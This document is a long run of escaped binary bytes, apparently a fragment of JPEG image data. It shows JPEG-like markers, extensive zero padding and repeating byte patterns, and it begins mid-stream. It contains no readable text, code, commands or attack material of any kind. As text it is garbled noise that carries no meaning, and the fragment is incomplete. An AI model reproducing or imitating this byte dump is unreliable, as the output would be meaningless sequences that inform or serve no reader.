x11r_\x0e[\xf7gx\x88\xf95\no\xf4ns\xd1\x8a}j\xcbZ6:o2\xe9\xa6=X\xda\xd9\x1dj\xaa\xce\x17\x1eg\xd4\xf9i\xe6\xe3^\xb8\x92\x8aD\x817I\xe8Q\xc6Ejx\xd0\xc1j\xa9\x95i\x98i\x92\xf9E\xbdQHKUV\xc0]y\x9fL\xe6f\xb0\x00t\x9em\xd2Lp\x13\xf4\x83\xa3\xd5dd\xcd\x1a\x07E\xe7g\x80\x01\xf7\xa5\xf3;!o\xabZ\xfc\x1f9\x8d\xae\xaat\xbd)=3OwC\x11\x13u\xa5]Ly(\xb7\xa2\x89\xadk\xaa\x1d\x0e3B\xc4D\xfa\x93\xa1\x11\x9e\x00\x05\xb2\xa7l-<\xc3\xa7\xf3\x12\xcdh\x89\x96)\xb2>ld4\xccT\xa9A\x97\x8c\x93,9t\xabE\xc1\xecSl5\xebQ\xee\xbb1L:\x15f\xcdJ6\xedU[Q\xe6\xb5Z\x97+\xfd\n\xb92N\xd6\xe6y\xa9\xd2\xf6\xa2e\x8e_3\xad.Zaf\xaae\xaa\x12b$M\xd5\xad\'-\xba@ZIE\x0el\x91\xa4\xf4hb\x87!\x1f._\xb9\xd7E\xe6\x06\x10\x00\x00\x00\x00\xb9\xd37\x0e\x93\x8f\x9f\x8cS\xb5\x9f\'T\x8e\xa9\xe0:$=K\xc9\xd03\xf3\xaf\xa5\xc2S\x9c{-\x93\x1c\xdf!r\x92\xe7>\x8e\x83[\x82\xc0t\xba\xf5s\x11-s\xe5[gJQt\xcb5(/\xb3\x1c\xe3\xd9~\xe6\x9b\xb1\xe5\xaa\xd5\xcd3\x9d\x02\x87\x8fL\xc5\xbd\xa3\xbat\x8e[\xd4\xb9\xd9\x93\xa0r\xed\xd2\xff\x00\x97\x97\xca\x17\xca\xcc\x14i\xd3\xf5)X\x8e\x8f\x0b_\x8a<\xf4~q t]J7\xc2>\xefH\xdc:M:3X\xd7Y>\x95\xa5\x94h_\xf9\xaec\xa2D\xd4q\x9d\x0b^\x85\xba_9\x8e]\x825e\x15\xa5\x97H\x87\xf7\xe0u\x0c\xbc\xd7!\x8bT/\x92\xdc\xba\\\xb5\xebW\xe2K\xdc\xb78\xf6Ye\xf9\xf6#\xa7U\xa2\xe2\x8c\xbd3\x9c^\xcf\\\xd6\xcdY\t\xbd\xa2\xb4\xb2\x8a\xd7O\xe7\xfe\x8e\x89\x82\x84:%F\xbb\x88\xb5\xda\xb9\\\xc1l\x90\xe7B\xd7%\xcf\xf2\x1d\x12\x8b\xab\xaa^ey\x86\xd9%\x9e\xb94]0\xd6vK\x1d*\xeb\xcf\x0b\xe6~v/[<\xf0Ze\xb9\xd6c\xa2s\x9fZF\xff\x00A\xe5y\xce\x9b\xf6\x8b\xe0\xb9\xf3\xaf\x1e\x0e\x81+\xcb\xe5\x0b\xbe^e\xb2Zf\xf9\xb6R\xff\x00\x97\x97\xca\x97\xba\x94<x\x9d\x83\xb4\x16>g\xd2\xf9\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\xb3^\xb6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1b:\xc3\xa8hs\xe1\x93\x18\x00\x00\x00\x00\x00\x00\x00\x02j\x14_\xfds\xe1`\xaf\x80\x00\x00\x00\x00\x00\x00\x00\x00\x07\xab\x9d(MB\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\xff\xc4\x00\x02\xff\xda\x00\x0c\x03\x01\x00\x02\x00\x03\x00\x00\x00!\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x04\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xccA\x05\x11@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`\x10A\x04\x10h\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\xa4\x10A\x04\x10U\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c$\x98\x89\x17\x9b\xcd\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$r\xac\xd5\xe7\x15\xac\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00<\xf2\xe0\x00\x00\x07\xb0\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\xf4\xc3\x9e\xb4\x7f-\xe4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\xe6\xaf<\xe7\xc1}d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x87\x7f;\xb1\xc6\xbf\xff\x00\xfe0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00/?\xff\x00\xff\x00\xfe\xfb\xef\x7f\xfe\xc0\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01o?\xff\x00\xfe\xfd\xcb\xff\x00\xff\x00\xfe\x98\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x007\x7f\xff\x00\xfbK[\x7f\xff\x00\xff\x00\xf8\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00P\x17\xff\x00\xff\x00\xf7Lk\x7f\xff\x00\xfe\xe0H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa4\x16\x7f\xff\x00\xff\x00\xedw\xef\xff\x00\xfc\x90P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x84\x14}\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xfc\x80U\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x01\x12\xc7\x1ds\xc7\x1cqRpP\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\xc2\x00\x00\x00\x00\x00A\x04 \xc3\x0c0\xc3$\x00\xc0\x00\x10\xc3\x08\x10\x00\x04 \x00\x00\x10\xc2\x0c \x01\x0c\x00\x00\x00\x00\x03\x00\x00\x01\x080\x80\x00\x10\xc2\x00\x10\x02\x00\x00C\x0cP\x80\x00\x00\x00\x00@\x06\x0c \x82\x04R@\x04\x12\x08$\xa3\x03\x00a\xca\x0cQ\xc0\x08 \x00\x04\x00\x00\x00@\x824\x90\xc2\x0c0\x81\x08\x01D\x00 \x86\x10\x82\x01\x08!\x02\x08@\x8d\x0c\x12\x824R\x80\x00\x00\x00\x00\x00\x05$S\xc2\x00\x01D\x10\x00\n\x00\xa3\xc5(\x10\x01\x04\x90\x00\x00P\x00\x14AN\x00\x00\r\x14\x93\x8a\x08\xc2\xca\x00\x01D\x08@\x88\x04\xc0\x07\x04\xa1\xc6\x00"\x004\x80B$\x11\x00\x00\x00\x00\x00A\xc4\x18\x02\xc9\x0c\x13\xc2 0\t(\x13\x84\x10\xb0\x87\x0cq\x03\x000\x80\x04 \x0c\x00\x10\n\x00\xa0A\x04A\x8c\x00\x00\x86\x10\xa0\xc6\x18\x11C\x00\x92\xc2\x08\x82\xcc\x040\xc2\x00P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x040\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x01\x08 \x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xc4\x00\x02\xff\xda\x00\x0c\x03\x01\x00\x02\x00\x03\x00\x00\x00\x10\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xce<\xc3O<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf2\x00A\x07\x15|\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xd2\x90A\x04\x10p\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\x84\x10A\x04\x10\x15\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf0$\x9eV\xbaN\xc5s\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf\x0c\xf2\xa7\n\xda\xee<\xe3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf\x1c\xd1\xef<\xf3\xcdx\xa3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf\x0b6\xfb~QY@\xe7\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf 